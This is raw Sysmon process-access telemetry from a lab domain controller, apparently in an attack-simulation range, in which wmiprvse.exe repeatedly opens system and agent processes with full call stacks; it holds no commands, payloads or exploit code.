15:59:39.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026866Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026865Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026864Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026863Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026862Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026861Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026860Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026859Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026858Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026857Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026856Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026855Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026854Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026853Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026852Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026851Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026850Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026849Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026848Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026847Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 